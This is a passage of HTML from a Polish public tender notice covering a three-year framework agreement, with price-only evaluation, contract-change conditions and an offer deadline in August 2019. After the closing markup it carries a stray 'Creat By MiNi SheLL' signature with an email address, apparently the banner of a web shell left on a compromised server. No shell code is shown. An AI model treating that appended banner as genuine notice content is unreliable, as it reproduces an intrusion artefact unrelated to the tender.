liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta">z kilkoma wykonawcami</span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow">Tak</span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe">Zgodnie z wymaganiami Zamawiającego zawartymi w SIWZ:1.	Umowa ramowa, której wzór zawarty jest w Załączniku Nr 4 do Specyfikacji Istotnych Warunków Zamówienia (SIWZ) stanowiącym jej integralną część, zostanie zawarta:1)	z Wykonawcami, których oferty uzyskają największą liczbę punktów w kryterium ,,łączna cena brutto oferty", o którym jest mowa w Rozdziale XV SIWZ, nie mniejszą jednak niż 80 pkt.;2)	na okres 3 lat licząc od daty jej zawarcia, w związku z art. 100 ust. 1 ustawy.</span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">2.	Zamawiający przewiduje możliwość dokonania:1)	zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy;2)	oraz zmiany warunków realizacji zamówienia,- jeżeli zachodzi co najmniej jedna z okoliczności, o których mowa w art. 144 ust. 1-1b, 1d i 1e) ustawy i pod rygorem postanowień zawartych w art. 144 ust. 2-3 ustawy.3.	Zamawiający w odniesieniu do postanowień zawartych w ust. 2 przewiduje możliwość wprowadzenia następujących zmian:1)	zmiany warunków zamówienia w stosunku do określonych w umowie ramowej przy udzielaniu zamówienia, którego przedmiot jest objęty umową ramową, jeżeli zmiana ta nie jest istotna. Przepisy zawarte w art. 101 a ustawy stosuje się odpowiednio.2)	przedmiotu zamówienia publicznego objętego niniejszym postępowaniem;3)	zmiany sposobu realizacji przedmiotu umowy ramowej w szczególności Umowy realizacyjnej;4)	terminu płatności i terminu realizacji umowy oraz terminu płatności i realizacji bieżącego zamówienia realizacyjnego;5)	konieczności zmiany terminu wykonywania umowy ramowej, z uwagi na okoliczności, określone w § 3. ust. 1-2 wzoru umowy ramowej stanowiącego Załącznik Nr 4 do SIWZ;6)	zmiany obowiązujących przepisów prawa mających wpływ na realizację przedmiotu zamówienia, w szczególności zmiany obowiązującej stawki VAT potwierdzonej odpowiednimi ustawami i/lub stosownymi aktami wykonawczymi do tych ustaw obowiązujących na terenie Polski;7)	uzasadnionych przyczyn technicznych lub funkcjonalnych powodujących konieczność zmiany sposobu wykonania umowy ramowej;8)	konieczności zmiany terminu wykonania lub odbioru dostaw spowodowanej podjęciem przez Zamawiającego decyzji o przeprowadzeniu przez osobę trzecią kontroli jakości i sposobu realizacji umowy ramowej;9)	zaistnienia siły wyższej, tzn. powstaniu okoliczności, których strony nie mogły przewidzieć ani uniknąć, i których następstwom nie mogły zapobiec. W szczególności za siłę wyższą będzie się uważać działanie sił przyrody, takie jak np.: huragan, trzęsienie ziemi, powódź oraz inne zdarzenia takie jak np.: wojna, zamieszki, strajk generalny (obejmujący co najmniej 50% zakładów z branży związanej z wykonaniem umowy) trwające ponad 2 tygodnie, działania legislacyjne władz powodujące niemożność wykonania umowy ramowej;10)	Ograniczenia zakresu rzeczowego i/lub sposobu realizacji przedmiotu umowy w przypadku zmian organizacyjnych zaistniałych u Zamawiającego i/lub w przypadku wystąpienia potrzeb ograniczenia zakresu dostaw/zakupów w związku z wystąpieniem okoliczności, których nie dało się przewidzieć;Powyższe zmiany wymienione w pkt. 3 mogą spowodować zmniejszenie wynagrodzenia należnego Wykonawcy określonego w umowie ale nie mogą spowodować wzrostu tego wynagrodzenia;11)	Zwiększenia zakresu rzeczowego i/lub sposobu realizacji przedmiotu umowy w przypadku wystąpienia u Zamawiającego zwiększonych potrzeb wynikających ze zmian organizacyjnych, i/lub wystąpienia innych potrzeb zwiększenia zakresu dostaw/zakupów w związku z wystąpieniem okoliczności, których nie dało się przewidzieć.Powyższe zmiany wymienione w pkt. 4 mogą spowodować wzrost wynagrodzenia należnego Wykonawcy, wynikający wyłącznie ze zwiększenia zakresu rzeczowego czasowego wykonywania przedmiotu umowy;12)	Zmiany zakresu rzeczowego zamówienia określonego umową, który może zostać ograniczony przez Zamawiającego, bez skutków finansowych i prawnych dla Zamawiającego, w przypadku:a)	gdy wykonanie przedmiotu zamówienia w pełnym zakresie nie leży w interesie publicznym, czego nie można było wcześniej przewidzieć,b)	zaistnienia trudności finansowych u Zamawiającego,c)	wstrzymania wykonywania umowy ramowej przez uprawnione organy, z przyczyn nie wynikających z winy Wykonawcy.4.	Zmiany z ust. 2 - 3 inicjowane są na pisemny wniosek jednej ze Stron.5.	Wniosek w sprawie proponowanej zmiany musi zawierać co najmniej:1)	opis zmiany;2)	uzasadnienie zmiany wraz z załączeniem odpowiednich oświadczeń lub/i dokumentów potwierdzających celowość, konieczność lub/i prawidłowość takiej zmiany;3)	czas wykonania zmiany oraz jej wpływ na termin realizacji zamówienia czy zmianę wysokości wynagrodzenia należnego Wykonawcy, o którym mowa w umowie.7.	Wszelkie zmiany umowy ramowej, o których mowa w ust. 2 - 3, wymagają zgody obu Stron i muszą być dokonywane przez umocowanych przedstawicieli Zamawiającego i Wykonawcy w formie pisemnej w drodze aneksu do umowy, podpisanego przez Zamawiającego i Wykonawcę pod rygorem nieważności.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-08-30</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">POLSKI</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">1. Jawne otwarcie ofert nastąpi w dniu, w którym upływa termin składania ofert, o godz. 12:30 w siedzibie Zamawiającego: ul. Dorodna 16, 03-195 Warszawa, w bud. Nr 57, w sali Rady Naukowej.2. Dotyczy SEKCJA IV: PROCEDURA pkt. IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp (przetarg nieograniczony) Tak - Zamawiający wyjaśnia, że zapisy w SIWZ stanowią w VII Rozdziale SIWZ w ust. 7-8:7.	Zamawiający, informuje, że w niniejszym postępowaniu w trybie art. 24 aa ust. 1 ustawy, przewiduje możliwość dokonania w pierwszej kolejności oceny ofert, a następnie zbadania, czy Wykonawcy:1)	których oferty, niepodlegające odrzuceniu, zostały ocenione jako najkorzystniejsze, tzn. oferty które spełniły wymagania punktowe Zamawiającego zawarte w III Rozdziale SIWZ w ust. 1 pkt. 1 uzyskane na podstawie obliczeń wykonanych w oparciu o zasady określone w XV Rozdziale SIWZ;2)	nie podlegają wykluczeniu i spełniają warunki udziału w postępowaniu.8.	Jeżeli Wykonawcy, o którym mowa w ust. 7, uchylają się od zawarcia umowy ramowej, Zamawiający w trybie art. 24 aa ust. 2 ustawy może zbadać, czy nie podlegają wykluczeniu oraz czy spełniają warunki udziału w postępowaniu Wykonawcy, którzy złożyli oferty najwyżej ocenione spośród pozostałych ofert.3. W zakresie RODO zapisy w XIX Rozdziale SIWZ Postanowienia końcowe stanowią w ust.5-6:5.	Obowiązek informacyjny wynikający z art. 13 RODO w przypadku zbierania danych osobowych bezpośrednio od osoby fizycznej, której dane dotyczą, w celu związanym z postępowaniem o udzielenie zamówienia publicznego zawiera Załącznik Nr 7 do Ogłoszenia.6.	Wzór oświadczenia wymaganego od Wykonawcy w składanego w ofercie w zakresie wypełnienia obowiązków informacyjnych wynikających z RODO zawiera Załącznik Nr 8 do Ogłoszenia.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com